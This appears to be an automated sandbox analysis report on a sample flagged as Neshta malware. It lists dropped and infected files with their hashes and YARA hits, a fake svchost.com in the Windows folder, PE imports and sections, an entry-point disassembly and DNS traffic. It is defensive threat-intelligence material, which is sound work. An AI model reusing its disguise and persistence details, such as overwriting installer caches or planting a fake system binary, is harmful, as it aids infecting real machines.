                                                                                                                        SHA-256:70ED68891E1B8B9EBEBDFAC5E78E5A2C96A494A309E6E86EDFBE1507C1AAFECD
                                                                                                                        SHA-512:B34DA2164DFE64B604B60430A32C6DE6EA99B13D4EF9B972D017977DCCCBE46327FB4BDD9F6FE580816AB277D142780057B5C632A2FDB556AC231E461DC340AB
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe, Author: Florian Roth
                                                                                                                        C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exe
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.353925362184326
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJAz1pPYsl4KlIgZaBm/as/2NcLULCTGA:JxqjQ+P04wsmJCvzR4KygN2sTK2U9ON
                                                                                                                        MD5:632E914780CFB9DF4C2C829043D235A1
                                                                                                                        SHA1:042784F1011FB4CF1B596A7822FF5C19C8B8AC78
                                                                                                                        SHA-256:CA7157B577BFDFF1D3A94A441EA14F7AE6039432655980F03D09DA89923D822A
                                                                                                                        SHA-512:E811B185909AB1C986C3F17EBD3C46DEEC158D8AFB14DF2B82881B78C9C94F44D716C340D12D46D80B91AE95AF6DC169DE9ACA1C7AEAC29514ADA24DC519A36E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exe, Author: Florian Roth
                                                                                                                        C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.485543952012
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC19QHwtRF9YkjqOOdwtFR+9zAKEC2OoxAwMqc4:sr85C1IyRF9YkjqOOOB8zAK2OoxAwMqx
                                                                                                                        MD5:5BFD09277E78C899F354E5E1144B162A
                                                                                                                        SHA1:41A9E6398CCD75ABF1B0E482A196EA27E6E3E9F1
                                                                                                                        SHA-256:043710D790F7C99AA46C0C6347CC38046AA1B097519DB5F6A257B8E9B5FF578E
                                                                                                                        SHA-512:2EC324783041FF402543E60FF1A8C3A8673AC68CF4FA1AF86D20248FF3874AEAA37DF83380612E49DE8D4FD94D58D4E0CF1888E3ED1B9369C12C60735506A20D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, Author: Florian Roth
                                                                                                                        C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.562712500136307
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCzzw4jkfLZTxJtDSoieff:sr85CzEBfLzJtR
                                                                                                                        MD5:4C436BAC03F954F21B3D6192A898EDE3
                                                                                                                        SHA1:1817116645BC8D2C0FB3653694D9DEDB990D4D0A
                                                                                                                        SHA-256:2DFB8EEC68A9B0730567D2E18C9F4FDD2343238C6A2F4CA41750B229D3E3AD38
                                                                                                                        SHA-512:807A1F1D78DA195DF1D714E32C53C610FE3C0E2059BAE0C90C2A2491B48E93CA8D04BB8640CC034EF000F4846016CE4DE5EF7295FDBF72668C30645334F049D6
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, Author: Florian Roth
                                                                                                                        C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.515754456132426
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCYRnRdeHrI7hzUg2Ewhwy9Lt0+du:sr85CYRnRCr8JUg+t95Ldu
                                                                                                                        MD5:E1BDE940ECE6F7C7F80841740A907C05
                                                                                                                        SHA1:188CE476AF1396E98E7D95EC6B3D22DADC85F9DE
                                                                                                                        SHA-256:B4EDE55B8093B7E5BB26CF08684B3670B7890591FCCFBEC83AF2F79907401239
                                                                                                                        SHA-512:EB025FB6495BC3D34BEDB05ED5120EE1097B9EE8B233A2AA3ED7806802B8DEE0C7F76D0C7A600CB0910BDD2962E4C3695B1D8D31198C85AD7F139F3EFB939979
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, Author: Florian Roth
                                                                                                                        C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.562807885786494
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCKzw4jkfLZTxJtDSoieff:sr85CKEBfLzJtR
                                                                                                                        MD5:933DB9DADE1B2ADDE200F742940F61C9
                                                                                                                        SHA1:19208F6EE0F07F6BF61A9E8FA04BB6B299A2C512
                                                                                                                        SHA-256:CFA2C4E5DC5AE16C510BC789B478D13F9EC05372DBADCE8C0E78A7DCFC16A3DC
                                                                                                                        SHA-512:B98BDC38BEF6AFB8E6EF2230627290E0110875197625CCE0CC9CFD9A33954AD53F678148935442753E0E2D713DA17FDFD695E997ABFF45FBBCA22BD1F6B1C12D
                                                                                                                        Malicious:true
                                                                                                                        C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.51577139672898
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCkRnRdeHrI7hzUg2Ewhwy9Lt0+du:sr85CkRnRCr8JUg+t95Ldu
                                                                                                                        MD5:60738E3D150CFDD2CD11C779ED82C473
                                                                                                                        SHA1:ED9010E56426DD75DA04F45A22C6964A06DB52C0
                                                                                                                        SHA-256:AD8620D29F365145B787B9225905089FA1205A6A67775BD36EE6FF66F9AE56EB
                                                                                                                        SHA-512:F67BBBE6A8134E6342647AA03C7B59C2AA78D224DAE82B11D5EE5FC0B15BE90C30E604411E97E2E4E6E8B28D8424A2C9B0E10A130A5F21B4FA0C6A121A667D63
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, Author: Florian Roth
                                                                                                                        C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.485564517117053
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCz9QHwtRF9YkjqOOdwtFR+9zAKEC2OoxAwMqc4:sr85CzIyRF9YkjqOOOB8zAK2OoxAwMqx
                                                                                                                        MD5:6A3C227401357DD0ACEE2988511EC44C
                                                                                                                        SHA1:2CB5F9BFC06F902D3B8ADCEBDF7A6DB5E8D1815A
                                                                                                                        SHA-256:67FD35785411A8926559D94CF258C6CC40A1D2683B36CBD3E99124B43D3F4307
                                                                                                                        SHA-512:A2A3F4E5FD748BF74A6CDE8674540AD893F7F8B6FFBD896E81911805DF9E8DC3CCDB832661DA8A7A5505F74EA81863593DDF7CF4759C1028846C4461EA0D8E71
                                                                                                                        Malicious:true
                                                                                                                        C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):243189
                                                                                                                        Entropy (8bit):7.925477612699072
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:8Qq+a3CstoxrFKLP+BFY0GfiqlMthQtpAp:TayYbyuiqS1p
                                                                                                                        MD5:4A10F66447AAF017229FF618AAB923E3
                                                                                                                        SHA1:97CCC229FE85D8A904152EB5DAF42AA6638A2FB6
                                                                                                                        SHA-256:D2D80FB82C8B5D7315EACC3109C9A108C67A2961402941FDB996094A68E4A21C
                                                                                                                        SHA-512:6AADAFC7FD20CB9FB2FE0BDF47EF78815037C6B9EEDB33DFFE561C623DB89ABE98A7827A9C861C35997EC48207AF855A51CB11145FE888E7039C0265E9146384
                                                                                                                        Malicious:true
                                                                                                                        C:\Users\user\AppData\Local\Temp\96vl4alc03rj
                                                                                                                        Process:C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):186880
                                                                                                                        Entropy (8bit):7.999072130972999
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:3072:ntwY1UstoxrHlVRTW4DwtPeqPiWiIAH5AYhJFY0GrbiIplSjb3t3GgJMu:t3CstoxrFKLP+BFY0GfiqlMtJ
                                                                                                                        MD5:0E39AC439A13C08DAC78B74B1D5FDB88
                                                                                                                        SHA1:E5F5EB82DA5789E321207313935DA27B77E24AF3
                                                                                                                        SHA-256:A82F9CD290F5C7647DB9AA379D19386D71CFA82F3DD3775656CDEDFD0341A726
                                                                                                                        SHA-512:FED0E294C1788FFE1D01CD0DBF80D79B4AB3BDF0AACEA605731F796A972D2C55F6C2B7BE88BFC8F62DB4B30F822215AE41FF3F5C1558E96B719BB0EFE0042DFE
                                                                                                                        Malicious:false
                                                                                                                        C:\Users\user\AppData\Local\Temp\CR_0E027.tmp\setup.exe
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:modified
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.265455130586502
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCnaBqYq8A5V626j2yk+w9PajrxWfv:sr85Cnas/8OUx2ykUGv
                                                                                                                        MD5:BB762A775319A10BBC68B0EA9822F00E
                                                                                                                        SHA1:6BE26E938DCC437BDE58003D1314412C1EAB6550
                                                                                                                        SHA-256:1AC2F8C8F2D4F2257C9F762D44E760420940AE2E518DD4C5A2DD573077BB93A3
                                                                                                                        SHA-512:1C1B1E23140987DFC728CC02F57F2BB8D39E00ABEEF34D0C13B67555CAB231B35C73C3004B3EAD84936903629FF25D4D42165A26D569DD2260895E2C17E3A1FE
                                                                                                                        Malicious:true
                                                                                                                        C:\Users\user\AppData\Local\Temp\bziwxza
                                                                                                                        Process:C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):61971
                                                                                                                        Entropy (8bit):4.933303950920903
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:DJqTIEc/NgVuCAfdv8lPh61tKgIljnK64ih0cal2JP:DwTPcUuCWv8T66gIlKeh07kR
                                                                                                                        MD5:9E9935B531E598DEC723DE1C106FED7B
                                                                                                                        SHA1:9DB5D6D672F27330951176048EA0B514B5701E94
                                                                                                                        SHA-256:0A4BC0526B41E32E7E729CA7E8F6D8BCCFD14CB196915B71D0E5E9A1776B2ED8
                                                                                                                        SHA-512:CCF60790885EC956CC634FDB0EF91B05C80D5877B1B612D426027282907E7E34E458A9C0CA36CEF2A65D40695C8A308183BD9329E3D83CB4245EC0475F037D93
                                                                                                                        Malicious:false
                                                                                                                        C:\Users\user\AppData\Local\Temp\nse728B.tmp\System.dll
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):11264
                                                                                                                        Entropy (8bit):5.568877095847681
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:7DKnJZCv6VmbJQC+tFiUdK7ckD4gRXKQx+LQ2CSF:7ViJrtFRdbmXK8+PCw
                                                                                                                        MD5:C17103AE9072A06DA581DEC998343FC1
                                                                                                                        SHA1:B72148C6BDFAADA8B8C3F950E610EE7CF1DA1F8D
                                                                                                                        SHA-256:DC58D8AD81CACB0C1ED72E33BFF8F23EA40B5252B5BB55D393A0903E6819AE2F
                                                                                                                        SHA-512:D32A71AAEF18E993F28096D536E41C4D016850721B31171513CE28BBD805A54FD290B7C3E9D935F72E676A1ACFB4F0DCC89D95040A0DD29F2B6975855C18986F
                                                                                                                        Malicious:false
                                                                                                                        C:\Users\user\AppData\Local\Temp\nsrAB5E.tmp\System.dll
                                                                                                                        Process:C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):11264
                                                                                                                        Entropy (8bit):5.568877095847681
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:7DKnJZCv6VmbJQC+tFiUdK7ckD4gRXKQx+LQ2CSF:7ViJrtFRdbmXK8+PCw
                                                                                                                        MD5:C17103AE9072A06DA581DEC998343FC1
                                                                                                                        SHA1:B72148C6BDFAADA8B8C3F950E610EE7CF1DA1F8D
                                                                                                                        SHA-256:DC58D8AD81CACB0C1ED72E33BFF8F23EA40B5252B5BB55D393A0903E6819AE2F
                                                                                                                        SHA-512:D32A71AAEF18E993F28096D536E41C4D016850721B31171513CE28BBD805A54FD290B7C3E9D935F72E676A1ACFB4F0DCC89D95040A0DD29F2B6975855C18986F
                                                                                                                        Malicious:false
                                                                                                                        C:\Users\user\AppData\Local\Temp\tmp5023.tmp
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:Non-ISO extended-ASCII text, with NEL line terminators
                                                                                                                        Category:modified
                                                                                                                        Size (bytes):8
                                                                                                                        Entropy (8bit):3.0
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:BXr4:u
                                                                                                                        MD5:085EFDA28BD4046401B918F2D69DEF43
                                                                                                                        SHA1:748B740D74399A8E275CF160ED01AED170CA31D7
                                                                                                                        SHA-256:46FFB274FEC82AAEAFE546A83591DE331B98B677A4C82C16C74D36897248D6A2
                                                                                                                        SHA-512:15299B5515E5F8DCC89E03B61C59329EA108F2EC19E35CDC099814C8E81B4C72EE95EFF293B7163C292851DD4DF68A6A37E29F804E82D4C04A53A8E63A9A9F1F
                                                                                                                        Malicious:false
                                                                                                                        Preview: ..6.?.&A
                                                                                                                        C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):243189
                                                                                                                        Entropy (8bit):7.925477612699072
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:8Qq+a3CstoxrFKLP+BFY0GfiqlMthQtpAp:TayYbyuiqS1p
                                                                                                                        MD5:4A10F66447AAF017229FF618AAB923E3
                                                                                                                        SHA1:97CCC229FE85D8A904152EB5DAF42AA6638A2FB6
                                                                                                                        SHA-256:D2D80FB82C8B5D7315EACC3109C9A108C67A2961402941FDB996094A68E4A21C
                                                                                                                        SHA-512:6AADAFC7FD20CB9FB2FE0BDF47EF78815037C6B9EEDB33DFFE561C623DB89ABE98A7827A9C861C35997EC48207AF855A51CB11145FE888E7039C0265E9146384
                                                                                                                        Malicious:true
                                                                                                                        C:\Windows\directx.sys
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):108
                                                                                                                        Entropy (8bit):4.358111169474199
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:oNN+EaKC5zJF58NELkATwON+EaKC5zJF58NELkAy:oNN7aZ5zJF5cEgewON7aZ5zJF5cEg9
                                                                                                                        MD5:52AA0BDB0E60DC63867FE87CEA4725D7
                                                                                                                        SHA1:621CC3CAB5C4C31C9701F985531C94B95B287BC7
                                                                                                                        SHA-256:7BFA2255458C2FC99DE4610A24080B63F615E09D436F1CBA915165DAB92CD66B
                                                                                                                        SHA-512:9AE5AF558C8756C20B80B31570E1BF8A94798CECB4C6B13C9CF64198E0362D74F2CBD0EE0EC139F4C1172B5DB461D33C4C765A1DE854A35C208BCD2EE2C17F74
                                                                                                                        Malicious:true
                                                                                                                        Preview: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe..C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe..
                                                                                                                        C:\Windows\svchost.com
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):41472
                                                                                                                        Entropy (8bit):6.099304243780631
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ:JxqjQ+P04wsmJC
                                                                                                                        MD5:713C9023AF9454658983BDEEC3B3F4D4
                                                                                                                        SHA1:5EB4BF3CE89FB0537313C755E19BB940E5F5D0CF
                                                                                                                        SHA-256:F26FA29BBBE62DAB875487C1060F802970ED8E9A1CAF2F9CA9131692EDAE1D9C
                                                                                                                        SHA-512:4062505A12893D2823877D59486DD2E39AE26441C7B11530732C0751EB1F91F539E180F2B178CDE60845EBE1829DE31D0219A5F6613565719A6D8A133A1D429B
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Windows\svchost.com, Author: Florian Roth

                                                                                                                        Static File Info

                                                                                                                        General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.789687408663417
TrID:
• Win32 Executable (generic) a (10002005/4) 97.38%
• Win32 Executable Borland Delphi 6 (262906/60) 2.56%
• Win16/32 Executable Delphi generic (2074/23) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
File name: vi0EwpbUht.exe
File size: 284661
MD5: f478c15f5affd8359762b8c6b0e913a4
SHA1: 05b36949abd35a132488158f38149c7b582c8d3a
SHA256: e355ac0da4996011e91f28b11e03c44d54606ae4ceb0bc4f6d0a0edc4b3410ed
SHA512: 31f7f6d622fc730d5822f40a75e08fc2a48001f8cd696d4d3cb0ebebd45904f4bcc7f8b8dad0866a78baa056316b53d8d2c3b3298c5e0ec441a0fe202e350895
SSDEEP: 6144:k923CstoxrFKLP+BFY0GfiqlMthQtpAEQq+6:nyYbyuiqS176
                                                                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                        File Icon

Icon Hash: b2a88c96b2ca6a72

                                                                                                                        Static PE Info

                                                                                                                        General

Entrypoint: 0x4080e4
Entrypoint Section: CODE
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp: 0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 9f4693fc0c511135129493f2161d1e86

                                                                                                                        Entrypoint Preview

                                                                                                                        Instruction
                                                                                                                        push ebp
                                                                                                                        mov ebp, esp
                                                                                                                        add esp, FFFFFFE0h
                                                                                                                        xor eax, eax
                                                                                                                        mov dword ptr [ebp-20h], eax
                                                                                                                        mov dword ptr [ebp-18h], eax
                                                                                                                        mov dword ptr [ebp-1Ch], eax
                                                                                                                        mov dword ptr [ebp-14h], eax
                                                                                                                        mov eax, 00408054h
                                                                                                                        call 00007F8318365847h
                                                                                                                        xor eax, eax
                                                                                                                        push ebp
                                                                                                                        push 00408220h
                                                                                                                        push dword ptr fs:[eax]
                                                                                                                        mov dword ptr fs:[eax], esp
                                                                                                                        mov eax, 004091A8h
                                                                                                                        mov ecx, 0000000Bh
                                                                                                                        mov edx, 0000000Bh
                                                                                                                        call 00007F8318368991h
                                                                                                                        mov eax, 004091B4h
                                                                                                                        mov ecx, 00000009h
                                                                                                                        mov edx, 00000009h
                                                                                                                        call 00007F831836897Dh
                                                                                                                        mov eax, 004091C0h
                                                                                                                        mov ecx, 00000003h
                                                                                                                        mov edx, 00000003h
                                                                                                                        call 00007F8318368969h
                                                                                                                        mov eax, 004091DCh
                                                                                                                        mov ecx, 00000003h
                                                                                                                        mov edx, 00000003h
                                                                                                                        call 00007F8318368955h
                                                                                                                        mov eax, dword ptr [00409210h]
                                                                                                                        mov ecx, 0000000Bh
                                                                                                                        mov edx, 0000000Bh
                                                                                                                        call 00007F8318368941h
                                                                                                                        call 00007F8318368998h
                                                                                                                        lea edx, dword ptr [ebp-14h]
                                                                                                                        xor eax, eax
                                                                                                                        call 00007F8318366282h
                                                                                                                        mov eax, dword ptr [ebp-14h]
                                                                                                                        call 00007F8318366816h
                                                                                                                        cmp eax, 0000A200h
                                                                                                                        jle 00007F8318369A37h
                                                                                                                        call 00007F8318368F16h
                                                                                                                        call 00007F8318369729h
                                                                                                                        mov eax, 004091C4h
                                                                                                                        mov ecx, 00000003h
                                                                                                                        mov edx, 00000003h

                                                                                                                        Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x15000          0x864         .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x19000          0x1400        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x18000          0x5cc         .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x17000          0x18          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                                                                        Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
CODE    0x1000           0x722c        0x7400    False     0.617355872845   data       6.51167217489   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
DATA    0x9000           0x218         0x400     False     0.3623046875     data       3.15169834056   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
BSS     0xa000           0xa899        0x0       False     0                empty      0.0             IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata  0x15000          0x864         0xa00     False     0.37421875       data       4.17385976895   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls    0x16000          0x8           0x0       False     0                empty      0.0             IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata  0x17000          0x18          0x200     False     0.05078125       data       0.206920017787  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc  0x18000          0x5cc         0x600     False     0.848307291667   data       6.44309346589   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc   0x19000          0x1400        0x1400    False     0.2041015625     data       2.6426621724    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                                                        Resources

Name           RVA      Size    Type  Language  Country
RT_ICON        0x19150  0x10a8  data  Russian   Russia
RT_RCDATA      0x1a1f8  0x10    data
RT_RCDATA      0x1a208  0xac    data
RT_GROUP_ICON  0x1a2b4  0x14    data  Russian   Russia

                                                                                                                        Imports

DLL           Import
kernel32.dll  DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, GetThreadLocale, GetStartupInfoA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll    GetKeyboardType, MessageBoxA
advapi32.dll  RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll  SysFreeString, SysReAllocStringLen
kernel32.dll  TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll  RegSetValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll  WriteFile, WinExec, SetFilePointer, SetFileAttributesA, SetEndOfFile, SetCurrentDirectoryA, ReleaseMutex, ReadFile, GetWindowsDirectoryA, GetTempPathA, GetShortPathNameA, GetModuleFileNameA, GetLogicalDriveStringsA, GetLocalTime, GetLastError, GetFileSize, GetFileAttributesA, GetDriveTypeA, GetCommandLineA, FreeLibrary, FindNextFileA, FindFirstFileA, FindClose, DeleteFileA, CreateMutexA, CreateFileA, CreateDirectoryA, CloseHandle
gdi32.dll     StretchDIBits, SetDIBits, SelectObject, GetObjectA, GetDIBits, DeleteObject, DeleteDC, CreateSolidBrush, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, BitBlt
user32.dll    ReleaseDC, GetSysColor, GetIconInfo, GetDC, FillRect, DestroyIcon, CopyImage, CharLowerBuffA
shell32.dll   ShellExecuteA, ExtractIconA

                                                                                                                        Possible Origin

Language of compilation system  Country where language is spoken
Russian                         Russia

                                                                                                                        Network Behavior

                                                                                                                        Snort IDS Alerts

Timestamp                 Protocol  SID   Message                         Source Port  Dest Port  Source IP       Dest IP
06/10/21-20:54:57.211914  TCP       1201  ATTACK-RESPONSES 403 Forbidden  80           49753      34.102.136.180  192.168.2.6

                                                                                                                        TCP Packets


                                                                                                                        UDP Packets

                                                                                                                        Jun 10, 2021 20:54:10.095422983 CEST53607788.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:10.859957933 CEST5379953192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:10.918298960 CEST53537998.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:11.751101017 CEST5468353192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:11.804127932 CEST53546838.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:12.925803900 CEST5932953192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:12.979228973 CEST53593298.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:16.933178902 CEST6402153192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:16.994709015 CEST53640218.8.8.8192.168.2.6
